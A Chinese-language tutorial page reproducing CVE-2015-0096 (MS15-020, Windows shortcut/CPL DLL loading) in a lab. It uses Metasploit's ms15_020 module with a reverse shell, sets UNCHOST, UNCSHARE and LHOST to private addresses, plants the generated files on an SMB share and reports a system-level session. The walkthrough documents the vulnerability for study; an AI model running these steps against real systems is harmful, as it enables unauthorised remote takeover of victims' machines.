Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析

发布时间:2021-12-29 15:41:33 作者:柒染
来源:亿速云 阅读:177

这篇文章给大家介绍Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。

漏洞成因

    Microsoft Windows没有正确处理DLL文件的加载,存在远程代码执行漏洞,通过诱使用户打开远程WebDAV或SMB共享上的某些文件利用此漏洞,成功利用后可导致加载任意库。Windows使用.lnk来定义文件或者目录的快捷方式,可以使用.CPL文件来自定义图标。问题是,在Windows中,图标从模块(或者可执行文件或动态链接库)加载。事实上,.cpl文件实际上是DLL文件。因为攻击者可以定义哪些可执行模块会被加载,攻击者可以利用.LNK文件来执行任意代码。

漏洞环境

入侵主机linux:192.168.1.125

共享文件主机win7:192.168.1.102

受害者主机win7:192.168.1.109

漏洞复现

准备好两台Windows7的主机环境,搭建好一个,直接拷贝速度更快。

Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析

克隆一份Windows7:

Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析

在一台win7主机上的C盘中创建share文件夹,并进行共享。

Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析

在第二台主机上查看是否共享成功。

Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析

共享成功后,所需要的环境条件就以达成,接下来使用攻击机器kali Linux进行攻击。所使用工具为msf。

Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析

搜索相关漏洞:ms15_020

Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析

利用相关漏洞模块:

Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析

设置一个反弹shell:

Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析

查看需要设置的参数:

Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析

设置好参数,设置漏洞利用模块列表的UNCHOST和UNCSHARE

set UNCHOST 192.168.1.102

设置为文件共享主机地址

set UNCSHARE share

设置共享文件的文件夹,这里主机192.168.1.102在C盘下的share里文件夹开启了共享,提前创建好共享

set LHOST 192.168.1.125

设置漏洞成功利用后后门连接的地址

Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析

Exploit

执行漏洞

Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析

生成了几个文件,我们去生成的目录下把文件拷贝到共享主机的共享文件夹下:

Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析

可能会提示如下:Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析

利用重命名解决问题,记得改回。

Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析

受害者访问共享后,成功了触发了漏洞。

Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析

可以发现入侵者这边弹回来了一个回话session 1

Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析

成功获取到系统权限。

关于Microsoft DLL植入远程代码执行漏洞CVE-2015-0096方示例分析就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

推荐阅读:
  1. Microsoft RDP ActiveX 控件远程执行代码漏洞加固
  2. Windows远程代码执行漏洞及Microsoft Excel远程代码执行漏洞的示例分析

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

microsoft dll cve-2015-0096

上一篇:OpenStack版本Ussuri发布亮点有哪些

下一篇:Redis慢查询日志怎么配置

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》